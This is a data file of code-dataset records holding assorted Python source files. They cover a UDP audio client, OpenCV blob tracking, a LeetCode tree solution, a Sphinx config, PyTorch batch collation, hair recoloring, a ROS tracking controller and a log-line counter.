+{"seq_id":"19335255720","text":"import socket\nimport pyaudio\n\n# create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# set the server address and port\nserver_address = ('localhost', 10000)\n\n# create a PyAudio object\np = pyaudio.PyAudio()\n\n# set the audio format\nFORMAT = pyaudio.paInt16\n\n# set the number of channels\nCHANNELS = 1\n\n# set the sampling rate\nRATE = 44100\n\n# set the buffer size\nCHUNK = 1024\n\n# open the audio stream\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n output=True,\n frames_per_buffer=CHUNK)\n\n# send a connection message to the server\nsock.sendto(b'connect', server_address)\n\nwhile True:\n # receive data from the server\n data, server_address = sock.recvfrom(1024)\n \n if not data:\n # if no data is received, the server has disconnected\n break\n \n # play the audio data\n stream.write(data)\n \n# close the audio stream and PyAudio object\nstream.stop_stream()\nstream.close()\np.terminate()\n","repo_name":"antonjan/Qo-100_nb_transmitter","sub_path":"QO-100_txrx_UDP_v3.py","file_name":"QO-100_txrx_UDP_v3.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4172901250","text":"import cv2\nimport numpy as np\nimport math\nimport cmath\nimport skimage\nimport time\nimport multiprocessing\nimport sys\n\nfrom collections import deque\nfrom registration import register\n\nfrom foreground_extraction import *\nfrom blob_detection import *\n\nfrom config import *\n\ndef main():\n # Create a VideoCapture object and read from input file\n # If the input is the camera, pass 0 instead of the video file name\n cap = cv2.VideoCapture(INPUT_MASK)\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n cap_orig = cv2.VideoCapture(INPUT_VIDEO)\n\n # Check if camera opened successfully\n if 
(cap.isOpened()== False):\n print(\"Error opening video stream or file\")\n sys.exit()\n\n frame_width = int(cap.get(3))\n frame_height = int(cap.get(4))\n out = cv2.VideoWriter(OUTPUT_MASK_BLOB_DETECTION, cv2.VideoWriter_fourcc(*'mp4v'), fps, (DISPLAY_WIDTH, DISPLAY_HEIGHT))\n\n # Process original video if provided\n if (cap_orig.isOpened() and int(cap_orig.get(3) == frame_width and cap_orig.get(4) == frame_height)):\n using_orig = True\n\n\n cpus = multiprocessing.cpu_count()\n pool = multiprocessing.Pool(processes=cpus)\n\n start = time.clock()\n # Read until video is completed\n while(cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n orig_ret, orig_frame = cap_orig.read()\n if ret == True:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n moving_foreground = gray\n\n moving_foreground = remove_noise(moving_foreground)\n frame_with_detected_blobs, mask_blobs, orig_frame_with_blobs = detect_blobs(moving_foreground, frame, orig_frame)\n\n # Display the resulting frame\n\n #cv2.imshow('moving_foreground', cv2.resize(moving_foreground, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n cv2.imshow('detected_blobs', cv2.resize(frame_with_detected_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n #display the frame that keypoints are being found from as well as keypoints detected\n cv2.imshow('detected_blobs_mask', cv2.resize(mask_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n\n # display original frame with overlayed detected blobs\n if(using_orig and orig_frame_with_blobs is not None):\n cv2.imshow('detected_blobs_on_orig', cv2.resize(orig_frame_with_blobs, (DISPLAY_WIDTH, DISPLAY_HEIGHT)))\n\n #if not using_orig:\n # out.write(cv2.cvtColor(frame_with_detected_blobs, cv2.COLOR_GRAY2BGR))\n #else:\n # out.write(cv2.cvtColor(orig_frame_with_blobs, cv2.COLOR_GRAY2BGR))\n\n # Press Q on keyboard to exit\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n\n # Break the loop\n else:\n break\n\n # When everything done, release the video capture object\n cap.release()\n out.release()\n\n # Closes all the frames\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()\n","repo_name":"UCSD-E4E/baboon-tracking-archive","sub_path":"old_approaches/variable_background_tracking/test_dilate.py","file_name":"test_dilate.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70293300942","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def pathSum(self, root, sum):\n \"\"\"\n :type root: TreeNode\n :type sum: int\n :rtype: int\n \"\"\"\n self.count = 0\n def test(root, sum):\n if not root:\n return 0\n if root.val == sum:\n return 1 + test(root.left, sum - root.val) + test(root.right, sum - root.val)\n else:\n if not root.left and not root.right:\n return 0\n else:\n return test(root.left, sum - root.val) + test(root.right, sum - root.val)\n def preorder(root, sum):\n if not root:\n return\n if root:\n temp = test(root, sum)\n if temp:\n self.count += temp\n if root.left:\n preorder(root.left, sum)\n if root.right:\n preorder(root.right, sum)\n\n preorder(root, sum)\n return self.count\n\n ","repo_name":"CrazyCoder4Carrot/leetcode","sub_path":"python/401-450/437. Path Sum III.py","file_name":"437. 
Path Sum III.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"39148448089","text":"# Configuration file for the Sphinx documentation builder.\n#\n# For the full list of built-in configuration values, see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Inkwell API'\ncopyright = '2023, Iheanyi Oziegbe'\nauthor = 'Iheanyi Oziegbe'\nrelease = '0.1'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = []\n\ntemplates_path = ['_templates']\nexclude_patterns = []\n\n\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'alabaster'\nhtml_static_path = ['_static']\n\n# custom css\nhtml_css_files = [\n 'css/custom.css',\n]\n\n","repo_name":"useinkwell/Inkwell-app","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2216216832","text":"from typing import List, Tuple, Dict, Callable\n\nimport numpy as np\nimport torch\nfrom PIL import Image\n\nfrom dataset.multicamera_video import MulticameraVideo\nfrom utils.lib_3d.pose_parameters import PoseParametersNumpy\n\n\nclass BatchElement:\n\n def __init__(self, observations: List[Tuple[Image.Image]], actions: List, rewards: List[int], metadata: List[List[Dict]], dones: List[bool],\n cameras: List[PoseParametersNumpy], focals: List[float], bounding_boxes: List[np.ndarray], bounding_boxes_validity: List[np.ndarray],\n observations_paths: List[List[str]], global_frame_indexes: List[int], video_frame_indexes: List[int], video_index: int, video: MulticameraVideo, transforms,\n optical_flows: List[Tuple[np.ndarray]]=None, optical_flow_transforms: Callable=None, keypoints: List[np.ndarray]=None,\n keypoints_validity: List[np.ndarray]=None, object_poses: List[List[PoseParametersNumpy]]=None, crop_regions: List[List[List[float]]]=None):\n '''\n Constructs a batch element\n\n :param observations: list of size (observations_count, observation_stacking, cameras_count) frames each from the most recent to the oldest\n :param actions: list of size (observations_count) actions\n :param rewards: list of size (observations_count) rewards\n :param metadata: list of size (observations_count, cameras_count) metadata\n :param dones: list of size (observations_count) booleans representing whether the episode has ended\n :param cameras: list of size (observations_count, cameras_count) camera poses\n :param focals: list of size (observations_count, cameras_count) camera focals\n :param bounding_boxes: list of size (observations_count, cameras_count) bounding boxes for each dynamic object instance\n :param bounding_boxes_validity: list of size (observations_count, cameras_count) bounding boxes validities for each dynamic object instance\n :param observations_paths: list of size (observations_count, cameras_count) strings with locations on disk of each frame, None if the frame is not on disk\n :param global_frame_indexes: list of size 
(observations_count) of integers representing the global indexes corresponding to the frames\n :param video_frame_indexes: list of size (observations_count) tensor of integers representing indexes in the original videos corresponding to the frames\n :param video_index: index of the video in the dataset\n :param video: the original video object\n :param transforms: transform to apply to each frame in the observations. Must return torch tensors\n :param optical_flows: list of size (observations_count, cameras_count) optical flows\n :param optical_flow_transforms: transform to apply to each optical flow. Must not be None if optical flows are present. Must return torch tensors\n :param keypoints: list of size (observations_count, cameras_count) keypoints for each dynamic object instance\n :param keypoints_validity: list of size (observations_count, cameras_count) keypoints validities for each dynamic object instance\n :param object_poses: list of size (observations_count) with pose parameters for each dynamic object instance\n :param crop_regions: list of size (observations_count, cameras_count) with crop regions (left, top, right, bottom) normalized in [0, 1]\n '''\n\n self.observations_count = len(observations)\n self.observations_stacking = len(observations[0])\n self.cameras_count = len(observations[0][0])\n\n if len(actions) != self.observations_count or len(rewards) != self.observations_count or len(dones) != self.observations_count or len(cameras) != self.observations_count \\\n or self.observations_count != len(focals) or self.observations_count != len(bounding_boxes) or self.observations_count != len(bounding_boxes_validity) \\\n or self.observations_count != len(global_frame_indexes) or self.observations_count != len(video_frame_indexes):\n raise Exception(\"Missing elements in the current batch\")\n if len(cameras[0]) != self.cameras_count:\n raise Exception(\"Missing elements in the current batch\")\n\n # Checks the number of dynamic object instances in the first observation of the first camera [0][0]\n if bounding_boxes[0][0].shape[1] != bounding_boxes_validity[0][0].shape[0]:\n raise Exception(f\"Bounding boxes contain {bounding_boxes[0][0].shape[1]} dynamic object instances, but \"\n f\"bounding boxes validities contain {bounding_boxes_validity[0][0].shape[0]} dynamic object instances\")\n\n self.actions = actions\n self.rewards = rewards\n self.metadata = metadata\n self.dones = dones\n self.cameras = cameras\n self.focals = focals\n self.bounding_boxes = bounding_boxes\n self.bounding_boxes_validity = bounding_boxes_validity\n self.observations_paths = observations_paths\n self.global_frame_indexes = global_frame_indexes\n self.video_frame_indexes = video_frame_indexes\n self.video_index = video_index\n self.video = video\n self.transforms = transforms\n self.optical_flow_transforms = optical_flow_transforms\n self.keypoints = keypoints\n self.keypoints_validity = keypoints_validity\n self.object_poses = object_poses\n self.crop_regions = crop_regions\n\n # Transforms each observation and puts them in the (observations_count, cameras_count, observation_stacking) order\n transformed_observations = []\n for observation_idx in range(self.observations_count):\n current_l1_observations = []\n for camera_idx in range(self.cameras_count):\n current_l2_observations = []\n for stack_idx in range(self.observations_stacking):\n current_observation = observations[observation_idx][stack_idx][camera_idx]\n # Applies a transformation if present\n if self.transforms is not None:\n 
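# Illustrative note, not from the original repo: self.transforms is typically a torchvision Compose such as transforms.Compose([transforms.Resize((height, width)), transforms.ToTensor()]), mapping each PIL frame to a (3, h, w) tensor as the docstring requires\n 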
current_observation = self.transforms(current_observation)\n current_l2_observations.append(current_observation)\n if torch.is_tensor(current_l2_observations[0]):\n current_l2_observations = torch.cat(current_l2_observations, dim=0)\n else:\n assert(len(current_l2_observations) == 1) # need observation stacking = 1 if images are not tensors\n current_l2_observations = current_l2_observations[0] # Eliminates stacking dimension\n current_l1_observations.append(current_l2_observations)\n if torch.is_tensor(current_l1_observations[0]):\n current_l1_observations = torch.stack(current_l1_observations)\n transformed_observations.append(current_l1_observations)\n if torch.is_tensor(transformed_observations[0]):\n transformed_observations = torch.stack(transformed_observations)\n self.observations = transformed_observations\n\n # Transforms each optical flow and puts them in the (observations_count, cameras_count) order\n self.optical_flows = None\n if optical_flows is not None:\n # Applies transformations to the optical flows if present\n if self.optical_flow_transforms is not None:\n optical_flows = [[self.optical_flow_transforms(current_flow) for current_flow in current_camera_flows] for current_camera_flows in optical_flows]\n else:\n raise Exception(\"Optical Flow transformations are None, but must at least include the conversion from Numpy to PyTorch\")\n # Stacks the camera dimension\n optical_flows = [torch.stack(current_camera_flows, dim=0) for current_camera_flows in optical_flows]\n # Stacks the observations_count dimension\n self.optical_flows = torch.stack(optical_flows, dim=0)\n\n # Converts arrays to torch\n self.cameras = [[current_element.to_torch() for current_element in current_camera] for current_camera in self.cameras]\n self.bounding_boxes = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.bounding_boxes]\n self.bounding_boxes_validity = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.bounding_boxes_validity]\n if self.has_keypoints(): # Converts keypoints to torch\n self.keypoints = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.keypoints]\n self.keypoints_validity = [[torch.from_numpy(current_element) for current_element in current_camera] for current_camera in self.keypoints_validity]\n if self.has_object_poses(): # Converts object poses to torch\n self.object_poses = [[current_object_pose.to_torch() for current_object_pose in current_observation_results] for current_observation_results in self.object_poses]\n if self.has_crop_regions():\n self.crop_regions = torch.as_tensor(self.crop_regions) # tensor (observations_count, cameras_count, 4)\n\n def has_keypoints(self) -> bool:\n '''\n Check whether keypoints data is available\n :return: True if keypoints data is present\n '''\n\n return self.keypoints is not None\n\n def has_flow(self) -> bool:\n '''\n Check whether optical flow data is available\n :return: True if optical flow data is present\n '''\n\n return self.optical_flows is not None\n\n def has_object_poses(self) -> bool:\n '''\n Check whether object poses are available\n :return: True if object poses are available\n '''\n\n return self.object_poses is not None\n\n def has_crop_regions(self) -> bool:\n '''\n Check whether crop regions are available\n :return: True if crop regions are available\n '''\n\n return self.crop_regions is not None\n\n\nclass Batch:\n\n def __init__(self, observations: torch.Tensor, 
actions: torch.Tensor, rewards: torch.Tensor, metadata: List[List[List[Dict]]], dones: torch.Tensor,\n camera_rotation: torch.Tensor, camera_translation: torch.Tensor, focals: torch.Tensor, bounding_boxes: torch.Tensor, bounding_boxes_validity: torch.Tensor,\n observations_paths: np.ndarray, global_frame_indexes: torch.Tensor, video_frame_indexes: torch.Tensor, video_indexes: torch.Tensor, videos: List[MulticameraVideo],\n optical_flows: torch.Tensor=None, keypoints: torch.Tensor=None, keypoints_validity: torch.Tensor=None,\n object_rotation: torch.Tensor=None, object_translation: torch.Tensor=None, crop_regions: torch.Tensor=None):\n '''\n\n :param observations: (bs, observations_count, cameras_count, 3 * observations_stacking, h, w) tensor with observed images\n :param actions: (bs, observations_count) tensor with observed actions\n :param rewards: (bs, observations_count) tensor with observed rewards\n :param metadata: list of size (bs, observations_count, cameras_count) with batch metadata\n :param dones: (bs, observations_count) tensor with observed dones\n :param camera_rotation (bs, observations_count, cameras_count, 3) tensor with camera rotations\n :param camera_translation (bs, observations_count, cameras_count, 3) tensor with camera translations\n :param focals (bs, observations_count, cameras_count) tensor with camera focals\n :param bounding_boxes (bs, observations_count, cameras_count, 4, dynamic_object_count) tensor with bounding boxes for dynamic object instances\n :param bounding_boxes_validity (bs, observations_count, cameras_count, dynamic_object_count) tensor with bounding boxes validity for dynamic object instances\n :param observations_paths (bs, observations_count, cameras_count) string array with paths for each observation on disk, None if observation is not present on disk\n :param global_frame_indexes: (bs, observations_count) tensor of integers representing the global indexes corresponding to the frames\n :param video_frame_indexes: (bs, observations_count) tensor of integers representing indexes in the original videos corresponding to the frames\n :param video_indexes: (bs) tensor of integers representing indexes of each video in the dataset\n :param videos: list of original bs videos\n :param optical_flows: (bs, observations_count, cameras_count, 2, h, w) tensor with optical flows\n :param keypoints (bs, observations_count, cameras_count, keypoints_count, 3, dynamic_object_count) tensor with keypoints for dynamic object instances\n :param keypoints_validity (bs, observations_count, cameras_count, dynamic_object_count) tensor with keypoints validity for dynamic object instances\n :param object_rotation (bs, observations_count, dynamic_object_count) tensor with camera rotations\n :param object_translation (bs, observations_count, dynamic_object_count) tensor with camera translations\n :param crop_regions (bs, observations_count, cameras_count, 4) tensor with crop regions normalized in [0, 1]\n '''\n\n self.size = actions.size(1)\n\n self.observations = observations\n self.actions = actions\n self.rewards = rewards\n self.metadata = metadata\n self.dones = dones\n self.camera_rotation = camera_rotation\n self.camera_translation = camera_translation\n self.focals = focals\n self.bounding_boxes = bounding_boxes\n self.bounding_boxes_validity = bounding_boxes_validity\n self.observations_paths = observations_paths\n self.global_frame_indexes = global_frame_indexes\n self.video_frame_indexes = video_frame_indexes\n self.video_indexes = video_indexes\n self.video = 
videos\n\n self.keypoints = keypoints\n self.keypoints_validity = keypoints_validity\n\n self.optical_flows = optical_flows\n\n self.object_rotation = object_rotation\n self.object_translation = object_translation\n\n self.crop_regions = crop_regions\n\n def to_cuda(self):\n '''\n Transfers tensors to the gpu\n :return:\n '''\n self.observations = self.observations.cuda()\n self.actions = self.actions.cuda()\n self.rewards = self.rewards.cuda()\n self.dones = self.dones.cuda()\n self.camera_rotation = self.camera_rotation.cuda()\n self.camera_translation = self.camera_translation.cuda()\n self.focals = self.focals.cuda()\n self.bounding_boxes = self.bounding_boxes.cuda()\n self.bounding_boxes_validity = self.bounding_boxes_validity.cuda()\n self.global_frame_indexes = self.global_frame_indexes.cuda()\n self.video_frame_indexes = self.video_frame_indexes.cuda()\n self.video_indexes = self.video_indexes.cuda()\n\n if self.has_flow():\n self.optical_flows = self.optical_flows.cuda() # cuda() is not in-place, so the result must be reassigned\n\n if self.has_keypoints():\n self.keypoints = self.keypoints.cuda()\n self.keypoints_validity = self.keypoints_validity.cuda()\n\n if self.has_object_poses():\n self.object_rotation = self.object_rotation.cuda()\n self.object_translation = self.object_translation.cuda()\n\n def to_tuple(self, cuda=True) -> Tuple:\n '''\n Converts the batch to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (observations, actions, rewards, dones, camera_rotation, camera_translation, focals, bounding_boxes, bounding_boxes_validity, global_frame_indexes, video_frame_indexes, video_indexes) tuple\n '''\n\n if cuda:\n self.to_cuda()\n\n # Optical flow is not returned here, so as not to break backward compatibility of the code\n return self.observations, self.actions, self.rewards, self.dones, self.camera_rotation, self.camera_translation, \\\n self.focals, self.bounding_boxes, self.bounding_boxes_validity, self.global_frame_indexes, self.video_frame_indexes, self.video_indexes\n\n def to_keypoints_tuple(self, cuda=True):\n '''\n Converts the batch keypoints information to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (keypoints, keypoints_validity) tuple\n '''\n\n if not self.has_keypoints():\n raise Exception(\"Keypoints were requested from the batch, but the batch has no keypoints information\")\n\n if cuda:\n self.to_cuda()\n\n return self.keypoints, self.keypoints_validity\n\n def to_object_poses_tuple(self, cuda=True):\n '''\n Converts the batch object pose information to an input tuple\n :param cuda If True transfers the tensors to the gpu\n :return: (object_rotation, object_translation) tuple\n '''\n\n if not self.has_object_poses():\n raise Exception(\"Object poses were requested from the batch, but the batch has no object pose information\")\n\n if cuda:\n self.to_cuda()\n\n return self.object_rotation, self.object_translation\n\n def pin_memory(self):\n\n # pin_memory() returns a pinned copy rather than modifying the tensor in place, so every result is reassigned\n self.observations = self.observations.pin_memory()\n self.actions = self.actions.pin_memory()\n self.rewards = self.rewards.pin_memory()\n self.dones = self.dones.pin_memory()\n self.camera_rotation = self.camera_rotation.pin_memory()\n self.camera_translation = self.camera_translation.pin_memory()\n self.focals = self.focals.pin_memory()\n self.bounding_boxes = self.bounding_boxes.pin_memory()\n self.bounding_boxes_validity = self.bounding_boxes_validity.pin_memory()\n self.global_frame_indexes = self.global_frame_indexes.pin_memory()\n self.video_frame_indexes = self.video_frame_indexes.pin_memory()\n self.video_indexes = self.video_indexes.pin_memory()\n\n if self.has_flow():\n self.optical_flows = self.optical_flows.pin_memory()\n\n if self.has_keypoints():\n self.keypoints = self.keypoints.pin_memory()\n self.keypoints_validity = self.keypoints_validity.pin_memory()\n\n if self.has_object_poses():\n self.object_rotation = self.object_rotation.pin_memory()\n self.object_translation = self.object_translation.pin_memory()\n\n return self\n\n def has_keypoints(self) -> bool:\n '''\n Check whether keypoints data is available\n :return: True if keypoints data is present\n '''\n\n return self.keypoints is not None\n\n def has_flow(self) -> bool:\n '''\n Check whether optical flow data is available\n :return: True if optical flow data is present\n '''\n\n return self.optical_flows is not None\n\n def has_object_poses(self) -> bool:\n '''\n Check whether object poses are available\n :return: True if object poses are available\n '''\n\n return self.object_rotation is not None and self.object_translation is not None\n\n def has_crop_regions(self) -> bool:\n '''\n Check whether crop regions data is available\n :return: True if crop regions data is present\n '''\n\n return self.crop_regions is not None\n\n\ndef single_batch_elements_collate_fn(batch: List[BatchElement]) -> Batch:\n '''\n Creates a batch starting from single batch elements\n\n :param batch: List of batch elements\n :return: Batch representing the passed batch elements\n '''\n\n observations_tensor = torch.stack([current_element.observations for current_element in batch])\n\n actions_tensor = torch.stack([torch.tensor(current_element.actions, dtype=torch.int) for current_element in batch], dim=0)\n rewards_tensor = torch.stack([torch.tensor(current_element.rewards) for current_element in batch], dim=0)\n dones_tensor = torch.stack([torch.tensor(current_element.dones) for current_element in batch], dim=0)\n\n # Converts the PoseParameter objects into separate rotation and translation lists of dimension (bs, observations_count, cameras_count)\n all_camera_rotations = []\n all_camera_translations = []\n for current_batch_element in batch:\n l1_list_rotation = []\n l1_list_translation = []\n for current_observation in current_batch_element.cameras:\n l2_list_rotation = []\n l2_list_translation = []\n for current_camera in current_observation:\n current_rotation, current_translation = current_camera.get_rotation_translation()\n l2_list_rotation.append(current_rotation)\n l2_list_translation.append(current_translation)\n l1_list_rotation.append(torch.stack(l2_list_rotation))\n l1_list_translation.append(torch.stack(l2_list_translation))\n all_camera_rotations.append(torch.stack(l1_list_rotation))\n all_camera_translations.append(torch.stack(l1_list_translation))\n\n camera_rotation_tensor = torch.stack(all_camera_rotations)\n camera_translation_tensor = torch.stack(all_camera_translations)\n\n focals = torch.as_tensor([current_element.focals for current_element in batch], dtype=torch.float)\n bounding_boxes = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.bounding_boxes]) for current_element in batch])\n bounding_boxes_validity = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.bounding_boxes_validity]) for current_element in batch])\n observations_paths = np.asarray([current_element.observations_paths for current_element in batch], dtype=object) # dtype object to support strings of arbitrary length\n\n keypoints = None\n keypoints_validity = None\n if batch[0].has_keypoints():\n keypoints = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.keypoints]) for current_element in batch])\n keypoints_validity = torch.stack([torch.stack([torch.stack(current_camera_element) for current_camera_element in current_element.keypoints_validity]) for 
current_element in batch])\n\n global_frame_indexes_tensor = torch.stack([torch.tensor(current_element.global_frame_indexes, dtype=torch.long) for current_element in batch], dim=0)\n video_frame_indexes_tensor = torch.stack([torch.tensor(current_element.video_frame_indexes, dtype=torch.long) for current_element in batch], dim=0)\n video_indexes_tensor = torch.tensor([current_element.video_index for current_element in batch], dtype=torch.long)\n\n batch_metadata = [batch_element.metadata for batch_element in batch]\n\n videos = [current_element.video for current_element in batch]\n\n # Stacks the optical flow if present\n optical_flows_tensor = None\n if batch[0].has_flow():\n optical_flows_tensor = torch.stack([current_element.optical_flows for current_element in batch])\n\n # Converts the PoseParameter object for object poses into rotation and translation tensors\n object_rotation_tensor = None\n object_translation_tensor = None\n if batch[0].has_object_poses():\n all_object_rotations = []\n all_object_translations = []\n for current_batch_element in batch:\n l1_list_rotation = []\n l1_list_translation = []\n for current_observation in current_batch_element.object_poses:\n l2_list_rotation = []\n l2_list_translation = []\n for current_pose in current_observation:\n current_rotation, current_translation = current_pose.get_rotation_translation()\n l2_list_rotation.append(current_rotation)\n l2_list_translation.append(current_translation)\n l1_list_rotation.append(torch.stack(l2_list_rotation, dim=-1)) # Stacks on the last dimension to pose the object dimension in the last position\n l1_list_translation.append(torch.stack(l2_list_translation, dim=-1))\n all_object_rotations.append(torch.stack(l1_list_rotation))\n all_object_translations.append(torch.stack(l1_list_translation))\n\n object_rotation_tensor = torch.stack(all_object_rotations)\n object_translation_tensor = torch.stack(all_object_translations)\n\n crop_regions = None\n if batch[0].has_crop_regions():\n crop_regions = torch.stack([batch_element.crop_regions for batch_element in batch])\n\n return Batch(observations_tensor, actions_tensor, rewards_tensor, batch_metadata, dones_tensor, camera_rotation_tensor,\n camera_translation_tensor, focals, bounding_boxes, bounding_boxes_validity, observations_paths, global_frame_indexes_tensor,\n video_frame_indexes_tensor, video_indexes_tensor, videos, optical_flows=optical_flows_tensor,\n keypoints=keypoints, keypoints_validity=keypoints_validity, object_rotation=object_rotation_tensor,\n object_translation=object_translation_tensor, crop_regions=crop_regions)\n\n\ndef multiple_batch_elements_collate_fn(batch: List[Tuple[BatchElement]]) -> List[Batch]:\n '''\n Creates a batch starting from groups of corresponding batch elements\n\n :param batch: List of groups of batch elements\n :return: A List with cardinality equal to the number of batch elements of each group where\n the ith tuple item is the batch of all elements in the ith position in each group\n '''\n\n cardinality = len(batch[0])\n\n # Transforms the ith element of each group into its batch\n output_batches = []\n for idx in range(cardinality):\n # Extract ith element\n current_batch_elements = [current_elements_group[idx] for current_elements_group in batch]\n # Creates ith batch\n current_output_batch = single_batch_elements_collate_fn(current_batch_elements)\n output_batches.append(current_output_batch)\n\n return 
output_batches\n\n\n\n\n\n\n\n\n\n","repo_name":"willi-menapace/PlayableEnvironments","sub_path":"dataset/batching.py","file_name":"batching.py","file_ext":"py","file_size_in_byte":25752,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"47"} +{"seq_id":"23430694782","text":"import cv2\r\n\r\nfrom unet.network import network\r\nfrom colors import COLORS\r\nfrom change_color import ColorChanger\r\n\r\nclass ColorInvertor():\r\n\r\n def __init__(self):\r\n self.net = network()\r\n self.centroid = None\r\n self.changer = ColorChanger()\r\n\r\n self.__load_unet()\r\n\r\n def __load_unet(self):\r\n self.net.load_network()\r\n \r\n def __recalculate_color(self):\r\n self.changer.init_img = self.init_img\r\n self.changer.mask_img = self.mask_img\r\n self.changer.pref_color = COLORS[self.recolor]\r\n\r\n self.final_img = self.changer.BalancedAlgorithm()\r\n\r\n self.final_img = cv2.cvtColor(self.final_img, cv2.COLOR_HSV2BGR)\r\n\r\n\r\n def recolor_hair_image(self, img_name, color):\r\n self.init_img = cv2.imread(img_name)\r\n self.recolor = color\r\n\r\n # start network\r\n self.mask_img = self.net.proceed_image(self.init_img)\r\n\r\n self.__recalculate_color()\r\n\r\n cv2.imshow('Result', self.final_img)\r\n cv2.waitKey(0)\r\n\r\n def recolor_hair_video(self, color):\r\n self.recolor = color\r\n cap = cv2.VideoCapture(0)\r\n\r\n while True:\r\n _, frame = cap.read()\r\n self.init_img = cv2.resize(frame, (600,400))\r\n\r\n # start network\r\n self.mask_img = self.net.proceed_image(self.init_img)\r\n\r\n self.__recalculate_color()\r\n cv2.imshow('a', self.final_img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n","repo_name":"RadFam/hair-colorizing","sub_path":"work_color_invertor.py","file_name":"work_color_invertor.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"10048289023","text":"#! 
/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nfrom geometry_msgs.msg import Twist, Vector3, Pose, Vector3Stamped\n\ndef Go_to(media, mode, centro, dist):\n\n\tvel = Twist(Vector3(0,0,0), Vector3(0,0,0))\n\n\tif len(media) != 0 and len(centro) != 0:\n\n\t\tif mode != \"Approach started\" and mode != \"In front of object\":\n\t\t\tif (media[0] > centro[0]):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,-0.1))\n\t\t\t\tmode = \"Searching\"\n\n\t\t\tif (media[0] < centro[0]):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0.1))\n\t\t\t\tmode = \"Searching\"\n\n\t\t\tif (abs(media[0] - centro[0]) < 10):\n\t\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0))\n\t\t\t\tmode = \"Tracking\"\n\n\t\tif dist > 1.5 and mode == \"Approach started\":\n\t\t\tmode = \"Searching\"\n\n\t\tif dist < 1.5 and (mode == \"Tracking\" or mode == \"Approach started\"):\n\t\t\tvel = Twist(Vector3(0.1,0,0), Vector3(0,0,0))\n\t\t\tmode = \"Approach started\"\n\n\t\tif dist < 0.40 and (mode == \"In front of object\" or mode == \"Approach started\"):\n\t\t\tvel = Twist(Vector3(0,0,0), Vector3(0,0,0))\n\t\t\tmode = \"In front of object\"\n\t\n\treturn vel, mode\n","repo_name":"marcosvds/P1_RoboticaComputacional_2020.1","sub_path":"scripts/cor_A4.py","file_name":"cor_A4.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"1631669073","text":"x='201811123023'\r\nnum=0\r\n\r\nwith open(r'C:\\Users\\PC\\Desktop\\log_files\\201811123023.log',mode='r',encoding='utf8') as f:\r\n \r\n for line in f:\r\n list1=line.split(' ')\r\n str1=list1[1]\r\n list2=str1.split(':')\r\n str2=list2[1]\r\n list3=str2.split(',')\r\n str3=list3[0]\r\n if str3==x:\r\n num=num+1\r\n\r\nprint(num)\r\n","repo_name":"CUCSec/text-file-process-yangyifei0619","sub_path":"homework1(bingo).py","file_name":"homework1(bingo).py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
